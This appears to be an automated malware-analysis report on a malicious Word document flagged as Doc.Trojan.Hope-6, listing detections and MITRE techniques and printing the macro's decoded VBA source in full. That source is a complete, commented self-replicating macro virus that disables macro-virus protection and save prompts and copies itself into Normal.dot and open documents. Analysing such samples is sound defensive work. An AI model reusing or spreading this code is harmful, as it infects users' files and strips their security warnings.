MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to infect other documents. The macro disables user prompts and conversion warnings to ensure its code is copied to the Normal.dot template or the active document. The ClamAV detection name 'Doc.Trojan.Hope-6' further confirms its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Hope-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hope-6
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2035 bytes |
SHA-256: e42d52b39e7638c94756e7c2dfa029544d8eb051f8fd135e9b3b98c5cbe902ed |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '// The Following Is A Simple Class '// Virus. This Was Written To Help '// Explain The Basics Of A Word 97 '// Class Module Virus. This Does '// Not Go Into The Theory Of Class '// Infection But Instead Comments '// On The Technique Used In This '// Example. Private Sub Document_Open() '// This Hooks The Document Open And Will '// Run The Code Between The Sub/End Sub Application.EnableCancelKey = wdCancelDisabled '// This Prevents The User From Stoping '// Macro Execution Options.ConfirmConversions = Yes '// This Disables Document Conversion '// Warning... Yes = 0 = False Options.SaveNormalPrompt = Yes '// This Disables The Save Changes '// Warning For The NormalTemplate '// Again Yes = 0 = False Options.VirusProtection = Yes '// Disables Macro Warning '// Yes = 0 = False If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument '// This Sets The Target To Infect I = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) '// This Creates The String 'I' To Equal '// The Viral Code Set Destination = Target.VBProject.VBComponents.Item(1).CodeModule '// This Sets The 'Destination' To Which '// The Virus Will Use To Clear And Infect Destination.DeleteLines 1, Destination.CountOfLines '// This Clears The Target Destination '// So That The Virus Will Have A Clean '// Module To Infect Destination.AddFromString I '// This Adds The Virus Code To The '// Destination If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName '// If The Target Is The ActiveDocument '// It Will Save The Changes The Virus '// Made End Sub '// This Ends The Document_Open Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.